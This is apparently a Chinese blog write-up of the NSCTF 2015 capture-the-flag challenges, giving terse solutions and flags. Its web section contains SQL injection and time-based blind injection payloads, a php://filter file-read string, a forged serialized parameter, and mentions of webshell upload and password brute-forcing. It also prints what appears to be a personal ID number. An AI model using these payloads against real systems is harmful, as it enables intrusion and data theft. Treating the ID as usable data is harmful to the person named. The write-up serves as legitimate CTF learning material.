Skip to content

nsctf2015-writeup

Posted on:2015年10月12日 at 16:45

re1

ASCII找到flag:{NSCTF_md5065ca>01??ab7e0f4>>a701c>cd17340}
异或0x7
712df97688fe0b7a399f076d9dc60437

re2

找字符串
flag:{NSCTF_md57e0cad17016b0>?45?f7c>0>4a>1c3a0}
异或0x7
NSCTF_md50b7dfc60761e798328a0d9793f96d4f7

###re500 pyc 逆字节码运行 getflag5()即可 flag:{NSCTF_md576d958d8a8640dfe2ada4811aef59b26}

web1

index.php
flag:{NSCTF_1E72F25BA71580D7D7DDBD25ACF4A8F3}

web2

Referer: http://www.nsctf.net/
X-Forwarded-For: 101.200.73.168

Wm14aFp6cDdUbE5EVkVaZk5EZzRZamRoTW1SalkyUXdNbUUzTXpReE5qVmpNemxpWVRRMU1UZGtZ
ZmxhZzp7TlNDVEZfNDg4YjdhMmRjY2QwMmE3MzQxNjVjMzliYTQ1MTdkYmN9
flag:{NSCTF_488b7a2dccd02a734165c39ba4517dbc}

web3

key和ver都是5.5.9-1ubuntu4.12
NjY2YzYxNjczYTdiNGU1MzQzNTQ0NjVmMzY2MzM3Mzk2NTM5NjIzMzM2NjMzMDM4NjIzMDMwMzAzMzM1MzIzODM3NjEzODM4NjMzNjYzNjE2MjM5MzA2Njdk
666c61673a7b4e534354465f36633739653962333663303862303030333532383761383863366361623930667d
flag:{NSCTF_6c79e9b36c08b00035287a88c6cab90f}

web4

找到password.txt
username=admin&password=Nsf0cuS
290bca70c7dae93db6644fa00b9d83b9.php
本来看到以为是xss,结果直接改userlevel=root就好

flag={NSCTF_76b44eac527ad5c8789f5d2e0f1ede9a}

web5

rot13,逆序,base64,移位,逆序
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

web6

改if里面的==为=号直接输出用户名密码
G0od!JAVA3C41PTISAGO 1pt_Pa4sW0rd_K3y_H3re
登陆后给出base64 解密 key_Ch3ck_.txt
继续 Ch3ck_Au7h.php
检查作者
uname,upass提交
flag:{NSCTF_d7590edfdf8bcf958ced10cec94273a}

web7

Xiaoming09231995
开房记录 王伟   身份证号34112519831224875X

flag:{NSCTF_3ad65730a8f203a5ab861169e9547f6d}

web08

php://filter/read=convert.base64-encode/resource=index.php
flag:{NSCTF_9bac7a6e289bf89ee0061bd0abdef0ab}

web09

base64(md5(20150923)),id=3

/.index.php.swp
审计
	http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/09/changepassword.php?userInfo=a:2:{s:2:"id";s:1:"1";s:4:"pass";s:8:"20150923";}&oldPass=20150923&newPass=6666
flag:{NSCTF_98c5bf58e35877fc76ce03f0f01327c5}

web10

源码:http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/10/index.php.
先_CONFIG=1取消掉config,注释sql
	password=/*!OR*/%1=1%23&username=\&Submit=%E6%8F%90%E4%BA%A4&_CONFIG=1
	flag:{NSCTF_adf0ff1eb152b1e3398ba4523fc713f}

web11

可上传php5
暴力上传生成小马,index.php里面发现flag
flag{NSCTF_8f0fc74ddf786103ed56d20af3bf269}

web12

时间盲注 payload
字段flag
	sexlect(ord(substr((SELExCT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)%2513%2527flag%2527),1,1)))>1
内容
	username=admin%2527and(selexct(selxect(slexep(5))and(selecxt(ord(substr((selexct(flag)from(flag)),12,1))>13))))%23&filtername=x&Submit=%E6%8F%90%E4%BA$A4
flag:{NSCTF_98c5bf58e35877fc76ce03f0f01327c5}

Misc1

md5 nsfocous666

Misc2

提取出来key.rar 密码是nsfocous+5数字 爆破之
nsfocous56317

flag{NCTF_R4r_Cr4ck}

Misc3

主要是三个段 消费 初始 余额  确保两个等式正确 算一下就行 每1.8是B4
flag{NSCTF_RfID_Cr4ck}

Crypto

直接AES解密 flag{DISJV_Hej_UdShofjyed}
凯撒
NSCTF_Rot_EnCryption

Crypto2

分离图片,第二个就是flag
flag{NSCTF_e6532a34928a3d1dadd0b049d5a3cc57}

Crypto3

stegslove: blue0 反选 flag{NSCTF_Qr_C0De}